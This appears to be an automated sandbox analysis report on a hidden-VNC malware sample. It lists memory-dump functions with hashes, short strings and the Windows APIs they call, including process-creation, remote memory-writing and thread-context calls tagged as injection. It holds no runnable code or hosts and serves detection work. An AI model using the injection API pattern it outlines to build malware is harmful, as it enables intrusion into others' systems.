Snapshot File: hcaresult_0_2_6400000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: cc0e99f71d3a7af4429e084951079c57b447619a931b0c41bf094860b29fba9f
Instruction ID: 1e05de8ee07ad3db60a2839c82d15191847348638b4569f021e3b444b6742695
Opcode Fuzzy Hash: cc0e99f71d3a7af4429e084951079c57b447619a931b0c41bf094860b29fba9f
Instruction Fuzzy Hash: B5F1E338D01218DFEB99DFE4E5986ADBBB2FF49315F20402AE516A7390DB315985CF40

Function 06401598 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06401878
4'^q, xrefs: 06401888

Memory Dump Source

Source File: 00000000.00000002.1743749152.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6400000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 1b262b6c5d20a7062f9fb4ff39fbe76671933d49b76681cbeb4641654f13afa5
Instruction ID: 2870c14ee942701e31867f2811480dc1a04f57d23c17e72530d7fe47ec603c30
Opcode Fuzzy Hash: 1b262b6c5d20a7062f9fb4ff39fbe76671933d49b76681cbeb4641654f13afa5
Instruction Fuzzy Hash: 24A1F634E10219CFEB99DFE5D5446AEBBB2FF49301F60842AD512AB390CB345946CF90

Function 064A1249 Relevance: 2.5, Strings: 2, Instructions: 25COMMON

Download Yara Rule

Strings

?, xrefs: 064A1282
b, xrefs: 064A1256

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: ?$b
API String ID: 0-2183305837
Opcode ID: 0f90c77dea7e9fc0c67ed7cc032ad36225c9aec377dfabf53c1a0efaa23f6e95
Instruction ID: 79775ea2156ae42da116042ddff87e1ffb6c30431e76e0f89bda24df7debd3fc
Opcode Fuzzy Hash: 0f90c77dea7e9fc0c67ed7cc032ad36225c9aec377dfabf53c1a0efaa23f6e95
Instruction Fuzzy Hash: 9DF0FF30C0222CEFEBA58F60C4887EEBAB2BB18719F1494AAC10972281C7740AD4CF55

Function 064FEF74 Relevance: 1.8, APIs: 1, Instructions: 266processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064FF1E7

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: eab4bd460bbe0f00c669f16eebf7795f669e78de2648e8c723dd57c388e80a77
Instruction ID: 9e620773db77d67164ecda68e892c66123faa690f3afaf2cf9990432f9bb0787
Opcode Fuzzy Hash: eab4bd460bbe0f00c669f16eebf7795f669e78de2648e8c723dd57c388e80a77
Instruction Fuzzy Hash: 29A136B5D10258CFDB90CFA9C8417EEBBB1BB0A300F14916AE958B7340DB759989CF85

Function 064FEF80 Relevance: 1.8, APIs: 1, Instructions: 261processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064FF1E7

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 97895f70046077552c8d4d3d027962d13661c280c0fc91729ddacb73a3fede6c
Instruction ID: 1377d83e382bde556f99cd8d053b17ea1a3f9c59e38aac1b6bc82d01647132a5
Opcode Fuzzy Hash: 97895f70046077552c8d4d3d027962d13661c280c0fc91729ddacb73a3fede6c
Instruction Fuzzy Hash: CCA134B4D10258CFDB90CFA9C8817EEBBB1BB0A300F14916AE958B7340DB759989CF45

Function 064E1334 Relevance: 1.7, APIs: 1, Instructions: 178fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 064E14BB

Memory Dump Source

Source File: 00000000.00000002.1744632645.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: dd839fab8b0674087d74146c0a27f4488bb3b927bcaec42ce2ff6f7db29898a3
Instruction ID: f9aca303ccf07f6e8062d7824d4e693b57d3f83e182a13cf0c77af7566c1d0ff
Opcode Fuzzy Hash: dd839fab8b0674087d74146c0a27f4488bb3b927bcaec42ce2ff6f7db29898a3
Instruction Fuzzy Hash: 396145B0D003189FDB50CFA9C9857EEBBB1FB49315F24812AE819A7380D7789985CF81

Function 064E1340 Relevance: 1.7, APIs: 1, Instructions: 169fileCOMMON

Download Yara Rule

APIs

CopyFileA.KERNEL32(?,?,?), ref: 064E14BB

Memory Dump Source

Source File: 00000000.00000002.1744632645.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: CopyFile
String ID:
API String ID: 1304948518-0
Opcode ID: b5909abd03672be77985cde4abe624b389e64bf49fd343a018503547f5575bdf
Instruction ID: ab0913ab3ba89af96c478f6c0245e149714dfd5e39ff0c733247dea797373fa4
Opcode Fuzzy Hash: b5909abd03672be77985cde4abe624b389e64bf49fd343a018503547f5575bdf
Instruction Fuzzy Hash: A46145B0D003188FDB50CFA9C9857EEBBF1BB48315F24812AE859A7380DB749985CF85

Function 064E1814 Relevance: 1.7, APIs: 1, Instructions: 167registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 064E1980

Memory Dump Source

Source File: 00000000.00000002.1744632645.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 502de465d3dc0235a3d13a37cff30701879d92642dbbdc0b057d6fa5f88072f4
Instruction ID: afd9adfe84230883973920400de60425e28c47cd1c53cd1ea299709f3d0eddd3
Opcode Fuzzy Hash: 502de465d3dc0235a3d13a37cff30701879d92642dbbdc0b057d6fa5f88072f4
Instruction Fuzzy Hash: A051EDB4D00218DFDB54CFA9C885BEEBBF1BB09304F24912AE818A7240DB349985CF95

Function 064E1820 Relevance: 1.7, APIs: 1, Instructions: 157registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.KERNEL32(?,?,?,?,?,?), ref: 064E1980

Memory Dump Source

Source File: 00000000.00000002.1744632645.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d61dd17c337838f4fdf509bc2921912376281ae34e5d947c05bfb71674e38e48
Instruction ID: d2b4cd5cc448213ca49de5555b81cc9422d65df3bdfd9d361e80dc289a90325c
Opcode Fuzzy Hash: d61dd17c337838f4fdf509bc2921912376281ae34e5d947c05bfb71674e38e48
Instruction Fuzzy Hash: 5451DDB4D00258DFDB54CFA9C885BAEBBF1BF09304F24912AE858B7250DB349985DF84

Function 064E15DC Relevance: 1.6, APIs: 1, Instructions: 146registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 064E1710

Memory Dump Source

Source File: 00000000.00000002.1744632645.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 22088137985827ffc17ee137c6134adb0ae165b519491afce07d07b08b3d6473
Instruction ID: af68a0781a30ad33c9b21b9e81324f39c028eca1a4cb464ca4c6b422dfa33412
Opcode Fuzzy Hash: 22088137985827ffc17ee137c6134adb0ae165b519491afce07d07b08b3d6473
Instruction Fuzzy Hash: FB51FDB4D002489FDF14DFA9C981ADEBBF1BF09700F24912AE819BB250DB749985CF85

Function 064E15E8 Relevance: 1.6, APIs: 1, Instructions: 140registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(?,?,?,?,?), ref: 064E1710

Memory Dump Source

Source File: 00000000.00000002.1744632645.00000000064E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64e0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 4ed1c31f806fb06d0c35a43be47148c0d35922552c0f46138826e55c1fa37293
Instruction ID: 2b139aa7d4dd45f44b4363e9f5b3e64cf980209ccb3f67e6f633d3bebc638cf8
Opcode Fuzzy Hash: 4ed1c31f806fb06d0c35a43be47148c0d35922552c0f46138826e55c1fa37293
Instruction Fuzzy Hash: D551EDB4D002589FDF14DFA9C984AEEBBF1BF09700F24912AE819BB250DB749985CF45

Function 064FF9F0 Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 064FFACB

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 21575ade70ce5bc38c0590e9d768a26afe8adcf88010e18502a8ef4935cfff00
Instruction ID: 7f05237480c2bacfd4ec577c223cef60a5a88759c79e5c405f287cd955d602f3
Opcode Fuzzy Hash: 21575ade70ce5bc38c0590e9d768a26afe8adcf88010e18502a8ef4935cfff00
Instruction Fuzzy Hash: 2841B9B5D012589FCF10CFA9D984AEEFBF1BB49310F24902AE818B7250D735AA45CF64

Function 064FF9F8 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 064FFACB

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 5418c1c3bd8223bef7b2632ddde847777a2318cbd62af4a2fa400d66d8acf444
Instruction ID: 39c91a193c9395a265ba215f446b2a41f9e9971727e6f7b535a861980b3027da
Opcode Fuzzy Hash: 5418c1c3bd8223bef7b2632ddde847777a2318cbd62af4a2fa400d66d8acf444
Instruction Fuzzy Hash: 604199B5D012589FCF00CFA9D984ADEFBF1BB49310F24942AE818B7210D734AA45CF64

Function 064FF890 Relevance: 1.6, APIs: 1, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 064FF942

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c4dcb32d049f1f4014dbe32192f7360ca4ef29103805bc37e0a5de369084f9b4
Instruction ID: 1645c679d3d72e558238098c9e12f45f4ac1d091eb932a63e04908686f89af94
Opcode Fuzzy Hash: c4dcb32d049f1f4014dbe32192f7360ca4ef29103805bc37e0a5de369084f9b4
Instruction Fuzzy Hash: 454199B9D00258AFCF10CFA9D980ADEFBB5EB49320F10942AE815B7210D735A945CF64

Function 0643FA00 Relevance: 1.6, APIs: 1, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0643FAAC

Memory Dump Source

Source File: 00000000.00000002.1743926690.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6430000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3c0eadf0fdee1a8f641915b17fea66554893e7c3167fad2bc03697382c73343d
Instruction ID: 2f7f5a2ae5fe68d89e172cf64aadf0716db63dcc172d092ea64aff77cec91f97
Opcode Fuzzy Hash: 3c0eadf0fdee1a8f641915b17fea66554893e7c3167fad2bc03697382c73343d
Instruction Fuzzy Hash: 4031ECB4D002589FCF10DFAAD881AEEFBB0FB49310F14902AE814B7210D735A945CFA4

Function 064FF898 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 064FF942

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9bcc73b8fb06f1ab3b2209638800caa2c8cc0406283aaaea3fc25303b307e31c
Instruction ID: 4424fca7119294a83baba9f63b7e5fe72006d99fa35b0069f414e6500c3eec88
Opcode Fuzzy Hash: 9bcc73b8fb06f1ab3b2209638800caa2c8cc0406283aaaea3fc25303b307e31c
Instruction Fuzzy Hash: 7B3188B9D00258DFCF10CFA9D980ADEFBB1BB49310F10A42AE915B7210D735A945CF58

Function 064FF330 Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 064FF3E7

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: d7df33f58746dfc4a52104261296c2fbf674d50e1c190d8f2dec584c3c0b6c0a
Instruction ID: 7e306909f8b7ea35d9ab6aeaa7036a4389c165dedd4929bbcc71f51d658c53b8
Opcode Fuzzy Hash: d7df33f58746dfc4a52104261296c2fbf674d50e1c190d8f2dec584c3c0b6c0a
Instruction Fuzzy Hash: 5B41CCB5D012589FCB10DFAAD984ADEFFF0BB49314F14802AE404B7200C738A989CF64

Function 0643FA08 Relevance: 1.6, APIs: 1, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0643FAAC

Memory Dump Source

Source File: 00000000.00000002.1743926690.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6430000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 931b16c4a7da38c4a16ff45f20bd186a757fcbf597940eba9ee4ac0291458839
Instruction ID: c0ecd28c2a8cddecbdd5fd79306bdfedc020664c73240f759473dc4251f2361e
Opcode Fuzzy Hash: 931b16c4a7da38c4a16ff45f20bd186a757fcbf597940eba9ee4ac0291458839
Instruction Fuzzy Hash: 8F31A9B5D002589FCF14DFAAD984AEEFBB1BB49310F14942AE814B7210D739A945CF58

Function 0651D5E0 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0651D684

Memory Dump Source

Source File: 00000000.00000002.1744749984.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6510000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 07d19a66321b60388542699890377f8b756e92e64b82f3d108f8889be05edec9
Instruction ID: e2c91ffffc9747b33560632da58e9f8d2da259bceb0349833a8c836195c40ce2
Opcode Fuzzy Hash: 07d19a66321b60388542699890377f8b756e92e64b82f3d108f8889be05edec9
Instruction Fuzzy Hash: FF3199B5D012589FCF14CFA9D980ADEFBB1BF49310F14942AE818BB210D735A945CF98

Function 064FF338 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 064FF3E7

Memory Dump Source

Source File: 00000000.00000002.1744675853.00000000064F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64f0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 84a8488b78c7ebeb66f6035acc4dd0990f5a1310fd347600f4ed0487ff36ab6d
Instruction ID: 10c1bede6b9a14d030b1b36d880e5c95f649c63b99cbceb4146ddab910523fb3
Opcode Fuzzy Hash: 84a8488b78c7ebeb66f6035acc4dd0990f5a1310fd347600f4ed0487ff36ab6d
Instruction Fuzzy Hash: B531BCB5D012589FCB50DFAAD984AEEFBF1BF49310F24802AE414B7240C738A989CF54

Function 068DF2B0 Relevance: 1.5, Strings: 1, Instructions: 205COMMON

Download Yara Rule

Strings

(bq, xrefs: 068DF324

Memory Dump Source

Source File: 00000000.00000002.1745854815.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68c0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 22a91889e069e438a14db5d80945c8d4f5acd1a0c0ee2393898c9251d3503eef
Instruction ID: 072b007a0771ab0c8c960ffb02ffca4b6624d06358a0797ad6fb725b60614859
Opcode Fuzzy Hash: 22a91889e069e438a14db5d80945c8d4f5acd1a0c0ee2393898c9251d3503eef
Instruction Fuzzy Hash: 3461E435B002159FCB14DF68D844AAEBBB2FF89320F158565E616DB381DB31E841CBE1

Function 02DFC1C8 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

TJcq, xrefs: 02DFC2D1

Memory Dump Source

Source File: 00000000.00000002.1728364960.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: TJcq
API String ID: 0-1911830065
Opcode ID: de2002be601ea21d9c4edc1c87c82766e457d865127c6e926aaa9b875935fdb3
Instruction ID: 17a0d5e083822591c2f2af56fef84d0fa6fc9ffbc10638747e5e7a3ec3db6ccc
Opcode Fuzzy Hash: de2002be601ea21d9c4edc1c87c82766e457d865127c6e926aaa9b875935fdb3
Instruction Fuzzy Hash: 4251C074E00208DFCB94DFA9D488AADBBF6FF88300F15806AE915A7364DB34A955CF54

Function 0651E7A8 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,?,?), ref: 0651E847

Memory Dump Source

Source File: 00000000.00000002.1744749984.0000000006510000.00000040.00000800.00020000.00000000.sdmp, Offset: 06510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6510000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ba30db558b5f699fccebce6f828136dfa2970e87dbe0136abf3efb3ae09ff64
Instruction ID: cf2ad7dda8a7f58ed94507fc4f38af5007e813950e7418a550f10c578758a15b
Opcode Fuzzy Hash: 1ba30db558b5f699fccebce6f828136dfa2970e87dbe0136abf3efb3ae09ff64
Instruction Fuzzy Hash: 983198B9D00258EFCF14CFA9D880ADEFBB1BB49310F14942AE814BB210D735A945CF98

Function 06400D7B Relevance: 1.3, Strings: 1, Instructions: 86COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06401549

Memory Dump Source

Source File: 00000000.00000002.1743749152.0000000006400000.00000040.00000800.00020000.00000000.sdmp, Offset: 06400000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6400000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9c68df20fe9016619b94b6b5ccf36c92d3c89d73b0854cde67c13f6d03db59c9
Instruction ID: 70787d4c3d678ecf8bd39b8de30762d3032301a39932d13a9428c525b8dcd721
Opcode Fuzzy Hash: 9c68df20fe9016619b94b6b5ccf36c92d3c89d73b0854cde67c13f6d03db59c9
Instruction Fuzzy Hash: 88317C34D09269CFEB55CFA5D8546FEBBB1EF45700F10806BD412AB291C7341A86CFA1

Function 064AAFE1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

O, xrefs: 064AB0AD

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: O
API String ID: 0-878818188
Opcode ID: dfd7c458dc718fdb71362bc6a6d8242a0b7fc8ef1328da530cd84c0b0f8f1263
Instruction ID: 8006aecebe5ad185bd2c1d13f64351962e07ce48c6392b5af0e8194c049e5fb0
Opcode Fuzzy Hash: dfd7c458dc718fdb71362bc6a6d8242a0b7fc8ef1328da530cd84c0b0f8f1263
Instruction Fuzzy Hash: BC21D3789022289FEBA5DF68C954B9AB7F5BB08305F0060D9D10AE7294DB309F84CF00

Function 068C586C Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

@, xrefs: 068C54B1

Memory Dump Source

Source File: 00000000.00000002.1745854815.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68c0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: bbcbbb353040157a943839818eacead1b494a4971a9fa3d166586c67395b18d4
Instruction ID: 9cc2aade778e52aa511457769be4ac011b1dec1d6e27410feff7bbf15fbff0f1
Opcode Fuzzy Hash: bbcbbb353040157a943839818eacead1b494a4971a9fa3d166586c67395b18d4
Instruction Fuzzy Hash: 33F04974C4122ACBDBB48F18D888BEDB7F1EB04319F6144EE9129A2A80D7749BC5CF45

Function 064A1C27 Relevance: 1.3, Strings: 1, Instructions: 21COMMON

Download Yara Rule

Strings

P, xrefs: 064A1C7B

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: P
API String ID: 0-3110715001
Opcode ID: d7ddbe32fa067221a22e59618a091f8d2f06019e698c7c94d27910c8010f02b0
Instruction ID: 9f75e21b35e8c38743693fea0289143a8503154c605ba802f406265425f2a9de
Opcode Fuzzy Hash: d7ddbe32fa067221a22e59618a091f8d2f06019e698c7c94d27910c8010f02b0
Instruction Fuzzy Hash: E1F06C74D062289FDBA0DF64C9947DDBBB1BB08319F1014EAD609A3241C6315B84CF55

Function 068C5461 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

@, xrefs: 068C54B1

Memory Dump Source

Source File: 00000000.00000002.1745854815.00000000068C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_68c0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 509fa4eb26026d2e8317d91133b2f17feced52ed8cf3e3bb11edc8b67e323236
Instruction ID: bbe3c97099854453f11407539b6089216b516155cafa84350435398b8bb3bbbf
Opcode Fuzzy Hash: 509fa4eb26026d2e8317d91133b2f17feced52ed8cf3e3bb11edc8b67e323236
Instruction Fuzzy Hash: 2DF04D74D4122ACBDBA4CF18D888AD9B7F1EB04318F6144EE9529A2A40D6349FC58F55

Function 064AC89E Relevance: 1.3, Strings: 1, Instructions: 18COMMON

Download Yara Rule

Strings

M, xrefs: 064AC8DD

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 36d015ccf745b61ae98f4145bc151a7a32377945783c07162dca0353a173c941
Instruction ID: 7aad5ad8d9c5dc3b29796bc848ca30567cb529d2a2751619d33a6dc8b67a5e60
Opcode Fuzzy Hash: 36d015ccf745b61ae98f4145bc151a7a32377945783c07162dca0353a173c941
Instruction Fuzzy Hash: 6CE0DFB4804328DFCB50AF28D80868677F5FF01304F2016E6C009AB150D7395A86CF84

Function 064A84D3 Relevance: 1.3, Strings: 1, Instructions: 13COMMON

Download Yara Rule

Strings

M, xrefs: 064AC8DD

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID: M
API String ID: 0-3664761504
Opcode ID: 1fd3a2cdd35a1dc270c37f8384cd11125b59642459e60a4765603d02707bb343
Instruction ID: 18e4cfe7a27933b65869cb15f21bd27bc59e197d799eab927cacf42b7caebde6
Opcode Fuzzy Hash: 1fd3a2cdd35a1dc270c37f8384cd11125b59642459e60a4765603d02707bb343
Instruction Fuzzy Hash: E3D017B4A10328DFCB54BB25D84465A77B6BB44304F505AA7800AAB248EB349A458F84

Function 064A6CA8 Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d8068673357c97523c0d2b74afbaca3e5cd2e6e2296a9f54819d9470972c857
Instruction ID: bd2d76e1daac5e3848ca9108924ace4a5e349bcd6170e24e7af298e8dca61501
Opcode Fuzzy Hash: 7d8068673357c97523c0d2b74afbaca3e5cd2e6e2296a9f54819d9470972c857
Instruction Fuzzy Hash: 57711270D01308DFEB44CFA9E544AAEBBF2FF48304F25902AD416AB240D7745A86CF91

Function 064A6CB8 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6991db41094e5436c17f80120bf6673412ae833b57e056b1d3bba1449e78cf7
Instruction ID: 9aab240e33810517fcee94ac83e49734fb8ed4e418d683d2066c0416436424cb
Opcode Fuzzy Hash: c6991db41094e5436c17f80120bf6673412ae833b57e056b1d3bba1449e78cf7
Instruction Fuzzy Hash: E971F070D01308DFEB44CFA9E544AAEBBF2BF58344F25902AD416AB244D7745A86CF91

Function 064A67AC Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1744322451.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_64a0000_hvnc-CR-SCR-0710.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0dd33a57634d2bf211bf219f5cd83bfef82b8921f86fa69d3fa5e17359bece
Instruction ID: 7afa69caca4f7ff50e1acc7db44d2b0149c893684d71798abe66dd8e6be7516e
Opcode Fuzzy Hash: 2c0dd33a57634d2bf211bf219f5cd83bfef82b8921f86fa69d3fa5e17359bece
Instruction Fuzzy Hash: 5C516D70D05328DFEBA0CF65C544BAEBBB6FB1A304F29946AC019A7351C7759982CF40

Function 02DF2B42 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

